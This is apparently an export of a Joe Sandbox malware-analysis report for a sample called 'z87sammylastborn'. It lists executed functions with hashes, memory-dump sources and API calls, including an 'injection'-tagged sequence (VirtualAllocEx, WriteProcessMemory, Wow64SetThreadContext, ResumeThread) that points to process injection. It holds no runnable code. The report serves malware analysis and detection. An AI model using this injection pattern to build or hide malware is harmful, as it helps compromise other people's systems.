Opcode ID: c2a45cfa43ac18119a801c2b0f1849b342c6b9612510ef668f361f98f8024f5e
Instruction ID: 17dd2df8d70ed0196a4666aaeaf2f9b3e2003ef682cd58027fb7fc1bd6d6dacb
Opcode Fuzzy Hash: c2a45cfa43ac18119a801c2b0f1849b342c6b9612510ef668f361f98f8024f5e
Instruction Fuzzy Hash: 4441F2B0D00719CEDB28DFA9C9847DEBBB5BF49304F20806AD418AB295DB756946CF90

Function 00CA449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CA59C9

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d45029bc5a78e642f5f8f257798eaf51ebc584f9b707c504ec34a5db6ae0495a
Instruction ID: 208c566429f60628aaf4981216635430443edaf93323bd1538e08a65467e83a3
Opcode Fuzzy Hash: d45029bc5a78e642f5f8f257798eaf51ebc584f9b707c504ec34a5db6ae0495a
Instruction Fuzzy Hash: 8941F2B0D00719CBDB24DFAAC844B9EBBB5FF49304F20806AD418AB255DB756946CF90

Function 04FA1E1E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FA1EE2

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7a2295dd0f68509bf55dd907928072d922a5aa2547805dc7b556d974ce91e48f
Instruction ID: 4ee5d783960b83f790f4164d9d6c18c31f4f84bac5ebb57e0712373bb4e417db
Opcode Fuzzy Hash: 7a2295dd0f68509bf55dd907928072d922a5aa2547805dc7b556d974ce91e48f
Instruction Fuzzy Hash: EE31F7B1D00249DFDF15CF99C984ADEBBB1FF88314F15811AE818AB250DB75A895CF90

Function 0507A08A Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0507A120

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 11c060f309877943c2b23e2b0128654d1da2a95e8645b5e4f2193283b88c0de0
Instruction ID: e6bcff50a0564921616423eb655f3cc3eb0dab2d5f2851aa4d51847a7284e4a4
Opcode Fuzzy Hash: 11c060f309877943c2b23e2b0128654d1da2a95e8645b5e4f2193283b88c0de0
Instruction Fuzzy Hash: 5F2127B1D003099FDB10DFA9D885BEEBBF5FF48310F148429E919A7250C7789944CBA4

Function 0507A090 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0507A120

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1db47bc637a870df82fac61d414c78ac2f35ea1b0f0541b85110b65c63374724
Instruction ID: 38f5bdbfa9ba74c193fe6b5b41db31d80cdbaee90975300d6f7f0924fcb5b224
Opcode Fuzzy Hash: 1db47bc637a870df82fac61d414c78ac2f35ea1b0f0541b85110b65c63374724
Instruction Fuzzy Hash: 402105B1D003499FDB10DFAAD885BEEBBF5FF48310F54842AE919A7250C7789944CBA4

Function 0507A178 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0507A200

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bb76478d2c6069557e64d5d03d859fec7f3fcf927e1ab3c91e38cc91c3927dc5
Instruction ID: d8c491bef3ca5b4ed085b372eea49a7b291066237d8892f7c8a2092b6eacf125
Opcode Fuzzy Hash: bb76478d2c6069557e64d5d03d859fec7f3fcf927e1ab3c91e38cc91c3927dc5
Instruction Fuzzy Hash: 4E2139B1D002499FCB10DFAAC881AEEFBF5FF48310F10842AE519A7250C7399945CBA4

Function 06C51FC0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 06C52052

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: c8dcc96cded171f38d32bc55db2240c0f66aba5e437b27c741bd4e4900f8274f
Instruction ID: 1f09a9faab021b90583a2889197f8bc84c12902ef916ebde138974d82d3c6c54
Opcode Fuzzy Hash: c8dcc96cded171f38d32bc55db2240c0f66aba5e437b27c741bd4e4900f8274f
Instruction Fuzzy Hash: C42159B59002598FCB04DF99C944B9EFBF4FF49304F148569D419A7351C338A984CFA5

Function 05079EF2 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05079F76

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 89f68514829d045f70235c5070014cfade84738fc402267e9e3abc976b740235
Instruction ID: 53d138cde2ce38d6832524995e2e1a357c41abff4c9fc624a2da785b77d52f91
Opcode Fuzzy Hash: 89f68514829d045f70235c5070014cfade84738fc402267e9e3abc976b740235
Instruction Fuzzy Hash: 6C2138B1D042098FDB50DFAAC4857EEBBF4EF88310F108429D419A7240CB789945CFA4

Function 0507A180 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0507A200

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2e8025788ef735a9dce1a3b3654e6847442cc8b312451b026f1c74bece10132a
Instruction ID: b24a78d6456d30219feb83552bc1454e0908443bf8fab6c4c3587f9143ab4f11
Opcode Fuzzy Hash: 2e8025788ef735a9dce1a3b3654e6847442cc8b312451b026f1c74bece10132a
Instruction Fuzzy Hash: 682107B1D003499FCB10DFAAC885AEEFBF5FF48310F50842AE919A7250C7799944CBA5

Function 05079EF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05079F76

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f4de4003805a2a4b03ee766c38c90e88f746d118d3ef682d6183a5ffdbe73ab8
Instruction ID: cd41d6face5715d7f22e81d22a876851fcbb9acb35da0e7a8b4da72119d8a3ab
Opcode Fuzzy Hash: f4de4003805a2a4b03ee766c38c90e88f746d118d3ef682d6183a5ffdbe73ab8
Instruction Fuzzy Hash: E02118B1D043098FDB50DFAAC4857EEBBF4EF88310F548429D519A7240CB789944CFA4

Function 06C51FD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 06C52052

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: ef02eb939d2893d6dd66b20790c3e2afc51bcac03c88b3dfeaa4a1ac2cd3bed7
Instruction ID: f51c2d9bf8f95cb4e7df02d4071306a778df39b81cc78063efcaafaed889f2ec
Opcode Fuzzy Hash: ef02eb939d2893d6dd66b20790c3e2afc51bcac03c88b3dfeaa4a1ac2cd3bed7
Instruction Fuzzy Hash: AB2146B490024A8FCB10DF9AD844B9EFBF4FF88314F148569D419A7351C378A984CFA5

Function 06C5114C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,059AD49E,?,?,?,00000E20,?,?,06C520A0,03AA4108,02AEF360), ref: 06C52131

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 13e73517526644d06fae0d3ecf6327b93e35b905e56bc62c0937ae6ab361c778
Instruction ID: 1e4d1d0269ae0bba928d39eae0f6f4ed1e86ced9fcb22dda0744194dc7bc49c3
Opcode Fuzzy Hash: 13e73517526644d06fae0d3ecf6327b93e35b905e56bc62c0937ae6ab361c778
Instruction Fuzzy Hash: 432107B1D042098FDB54DF9AC844BAFFBF5EB88310F14842AD914A3250D778AA44CFA4

Function 00CAD788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD80F

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f7974f5ba3e391e5bde36bd518b56e0c7f572da9cfc2e96f578231ebf50a74d7
Instruction ID: 5c6a0556bf9c99c6788b887bc816b0720f25cfd708fd67aea918903448d4de75
Opcode Fuzzy Hash: f7974f5ba3e391e5bde36bd518b56e0c7f572da9cfc2e96f578231ebf50a74d7
Instruction Fuzzy Hash: 5A21C4B5D002499FDB10CFAAD984ADEBFF9FB49310F14841AE919A3350D378A944CFA5

Function 06C520BA Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,059AD49E,?,?,?,00000E20,?,?,06C520A0,03AA4108,02AEF360), ref: 06C52131

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 4ebebb377974d85de0885a6afd1f121ed581d05e608173d702c668218c4653d1
Instruction ID: 0800ab21d1234c739849ec73dc36de21e714a7e3c34331ffe443659406d3b7e7
Opcode Fuzzy Hash: 4ebebb377974d85de0885a6afd1f121ed581d05e608173d702c668218c4653d1
Instruction Fuzzy Hash: 8721F7B5D002098FDB54CFAAC944BEEFBF5EB88310F14842AD559A3250D778AA45CFA4

Function 04FA1E7E Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FA1EE2

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6ad1e66e31b09d0bdfdef3268f71ef133d05d008304f4bff1c087402426ff048
Instruction ID: f59bc0406b040020dc0f2ff87e7f154b85b1170f376d57011b55865b15a406ef
Opcode Fuzzy Hash: 6ad1e66e31b09d0bdfdef3268f71ef133d05d008304f4bff1c087402426ff048
Instruction Fuzzy Hash: 3321F4B5C10248EFEF11DF98C984BDEBBB5BB08318F158109E804AB260CB75A855DFA0

Function 05076068 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 050760DA

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: f83017d975172bd828af721fbeba4f802f931acae5e1c32fc3a7c3dea04576d1
Instruction ID: 442e14698b2a85d520499f14570719e68338670906a1e22e42c690db0f0b95de
Opcode Fuzzy Hash: f83017d975172bd828af721fbeba4f802f931acae5e1c32fc3a7c3dea04576d1
Instruction Fuzzy Hash: 1111F2B2C006098FDB14CF9AD444BDEFBF4EB88310F10802AD859A7240D379A54ACFA5

Function 05079FCA Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0507A03E

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9569ed8344b502301ee847b442fb19e2d3944575990b0c382ff815d15d8aa4c8
Instruction ID: 28151b42be24306dd3f553af2670c867911ae8d88bf6fe5becee3abbfbc01195
Opcode Fuzzy Hash: 9569ed8344b502301ee847b442fb19e2d3944575990b0c382ff815d15d8aa4c8
Instruction Fuzzy Hash: 391114B1D002499FCB10DFAAD844AEEBFF5FF88320F148819E519A7250C7799944CBA0

Function 05076070 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 050760DA

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 0275ec4fb53c48225dd775eb18a460f666e215fba6677fc670c370f3efead857
Instruction ID: d35a03bcbd93ab9455065f4d129b414e186c65c140b6d730be4adfaf73cada73
Opcode Fuzzy Hash: 0275ec4fb53c48225dd775eb18a460f666e215fba6677fc670c370f3efead857
Instruction Fuzzy Hash: C01112B2C006098FDB10CF9AD844BDEFBF8FB88320F10802AD859A3240D339A545CFA5

Function 05079FD0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0507A03E

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85101b8b321c15e6782fbdcd4b11c53d2eb05c36fbe938c162e8e7598d18397c
Instruction ID: 1c1fa87fdd9c279dbc2c69a6566f2a804088d3980677b7405bb827ec5dd92e81
Opcode Fuzzy Hash: 85101b8b321c15e6782fbdcd4b11c53d2eb05c36fbe938c162e8e7598d18397c
Instruction Fuzzy Hash: 291114719002499FCB10DFAAC844AEEBFF5EF88320F108819E519A7250C779A944CBA4

Function 05079E42 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05079EAA

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 73bd5e809cf301a84d1f63660f83ad11ed6334e05bd7f2ab353c40ad020ee49f
Instruction ID: 01f9d09ed382b6fb647eb8d7d0faa86103d5f7c5f6c12c6cb0ce4d3fac57dafd
Opcode Fuzzy Hash: 73bd5e809cf301a84d1f63660f83ad11ed6334e05bd7f2ab353c40ad020ee49f
Instruction Fuzzy Hash: E71125B1D002498FCB20DFAAD4457AEFBF5EF88320F208819D519A7250CB79A944CBA4

Function 05079E48 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05079EAA

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5c2e582b939236ac4c1eb7f0e5a7c80fb2c0b2f4cb8f9561c54e9b1ce911b54e
Instruction ID: 57efbbf38d4cb0ec6b18db18cba19d9057fa7366dc3b02aacfdfae1e277c5ede
Opcode Fuzzy Hash: 5c2e582b939236ac4c1eb7f0e5a7c80fb2c0b2f4cb8f9561c54e9b1ce911b54e
Instruction Fuzzy Hash: FA113AB1D002498FCB10DFAAC4457AFFBF5EF88320F108419D519A7250CB79A944CBA4

Function 05074444 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 05076605

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e78c8ee7f61a465a2191575b988d92f1f88d94d6934755e0b005e73aed64d89d
Instruction ID: e2122b7f1ba5b2c76ec75048810196999c0ee1a7f8cd8ef11492932bb98e6116
Opcode Fuzzy Hash: e78c8ee7f61a465a2191575b988d92f1f88d94d6934755e0b005e73aed64d89d
Instruction Fuzzy Hash: AE11F2B58047499FDB10DF9AD544BEEBFF8FB48310F108419E519A7200C379A944CFA9

Function 00CAB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB4FE

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d9b83d9044e12fbdde72099c02c9175cf5788f716eea32bcba76de89cf45b786
Instruction ID: 01d0fd6965024baf320f1a43b0a3a583420e14ebfbf8564fa9144c58da5594ec
Opcode Fuzzy Hash: d9b83d9044e12fbdde72099c02c9175cf5788f716eea32bcba76de89cf45b786
Instruction Fuzzy Hash: 3A11F2B5C007498FCB10DF9AD444ADEFBF8EF89314F14842AD429A7211D379AA45CFA5

Function 050765A0 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 05076605

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c563bdab80cf66532220408768acd8296c1650b3c4c35c0df7f6d44f39aceda5
Instruction ID: e857cefddc56df09469e7033c043b765dfae31add7fc8e167cad62ece9ec6702
Opcode Fuzzy Hash: c563bdab80cf66532220408768acd8296c1650b3c4c35c0df7f6d44f39aceda5
Instruction Fuzzy Hash: 1411E0B5C006499FCB10DF99D484BDEBFF8EB49320F208419D569A7240C379A944CFA5

Function 04FA2018 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 04FA2075

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: c2d265a8ee77905118d326d75f3554ba8de3fb0665e4d38941ceefc32492b528
Instruction ID: 11e82eea9a3107be795d3d9971d52972bb4adff9bea13a421bf9bd645f8ac54a
Opcode Fuzzy Hash: c2d265a8ee77905118d326d75f3554ba8de3fb0665e4d38941ceefc32492b528
Instruction Fuzzy Hash: 4C1112B58002498FDB10DF9AC484BDFFBF8EB88320F20845AD918A3300C379A944CFA5

Function 04FA2017 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 04FA2075

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 18bb7d3f6c5fa38798793dff6c5fd4e780e518122af1540866008264bdd59329
Instruction ID: 11f1e296839b666f04f83b4cac396aa6ac91dd588da8e4fec32d79c856e87bb3
Opcode Fuzzy Hash: 18bb7d3f6c5fa38798793dff6c5fd4e780e518122af1540866008264bdd59329
Instruction Fuzzy Hash: D61106B58002498FDB10CF99D485BEEBFF4EB48310F108459D558A3300C375A944CFA1

Function 06C51428 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 06C51485

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2e1874d6399ccc1e8b618a5dd94434c985907d581ee4dff2d975fba77343b5b3
Instruction ID: 4b36140fe141c28dc50c7b60766b798303c72fe949be59640d2b20157adf90f0
Opcode Fuzzy Hash: 2e1874d6399ccc1e8b618a5dd94434c985907d581ee4dff2d975fba77343b5b3
Instruction Fuzzy Hash: 951112B5C007488FCB10DFAAC549BDEBBF8AB48314F24845AD518A7700D338A584CFA4

Function 06C51430 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 06C51485

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 7c0808a51aeaceae34ca61817a856267ebfaa146270c05db778b0d98a95a5364
Instruction ID: f634c927789f1e32533b785c05d7c6ea31c0c31c4013553199d9560bc38347ff
Opcode Fuzzy Hash: 7c0808a51aeaceae34ca61817a856267ebfaa146270c05db778b0d98a95a5364
Instruction Fuzzy Hash: 9711E2B58007498FCB20DFAAD948B9EBBF8EB49324F248459D518A7610C379A584CFA5

Function 05071658 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,05072129,?,?), ref: 050722D0

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5c6cbd20f954c7b368437094379557869694a16f6ed21e79b47ac99f9fd99ae3
Instruction ID: 7b02d6fd3d30d2687ba2aaf9314952099f30c9be556786fb0bd71e066609bfb6
Opcode Fuzzy Hash: 5c6cbd20f954c7b368437094379557869694a16f6ed21e79b47ac99f9fd99ae3
Instruction Fuzzy Hash: 7C2189B5C083899FCB10DFA9D4447EEBFF4EF49320F14845AD598A7242C338A544CBA9

Function 05072271 Relevance: 1.3, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,05072129,?,?), ref: 050722D0

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2d07c81fd4e01c9505c5a971f20ea9c201f3507e3ec910712b25bffae727c912
Instruction ID: b00ac7ece1de3555de9854ab5b39cf6092ba929a4e8087e74c968b939ef6fad8
Opcode Fuzzy Hash: 2d07c81fd4e01c9505c5a971f20ea9c201f3507e3ec910712b25bffae727c912
Instruction Fuzzy Hash: 721125B5C002499FDB10DFA9D485BDEBFF4EB48320F108429D558A7640C338A545CFA5

Function 0507166C Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,05072129,?,?), ref: 050722D0

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3eae22370cd16e6cce5fb3a24210f18231cc5b500f3ea843ca504b80e9fb8a6d
Instruction ID: 337be56d575d098e30ef34ec281ac34949c880b1410113136e5ce4e021d72331
Opcode Fuzzy Hash: 3eae22370cd16e6cce5fb3a24210f18231cc5b500f3ea843ca504b80e9fb8a6d
Instruction Fuzzy Hash: D41125B5C046499FCB20DF9AD544BEEBBF4FB48320F108419D958A7340D738A944CFA9

Non-executed Functions

Function 04FA0130 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5b73ad217f482c7ef94e6812d378b6a651aa877d645961f5c1ca9297c84068
Instruction ID: 417ff71de61ba8cd3e6574d63e7227bb4b4b1ddea1ea06de0c12a05a09e91069
Opcode Fuzzy Hash: 7c5b73ad217f482c7ef94e6812d378b6a651aa877d645961f5c1ca9297c84068
Instruction Fuzzy Hash: E71261B040174A8ED730EF65ED4D1893AB1BB653A8B504309D2E16A2FDDBBE154BCF44

Function 00CAE084 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6976bb6218e87d473cc5a15fca7da654ef512b5b30d7459a464b7d34cac9154
Instruction ID: e988138c23dec482d6be2154e2bf73ec4eda191989bdb1ccc49abd648a54e68d
Opcode Fuzzy Hash: c6976bb6218e87d473cc5a15fca7da654ef512b5b30d7459a464b7d34cac9154
